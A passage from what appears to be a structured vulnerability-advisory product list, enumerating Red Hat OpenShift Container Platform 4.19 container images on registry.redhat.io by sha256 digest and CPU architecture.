"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
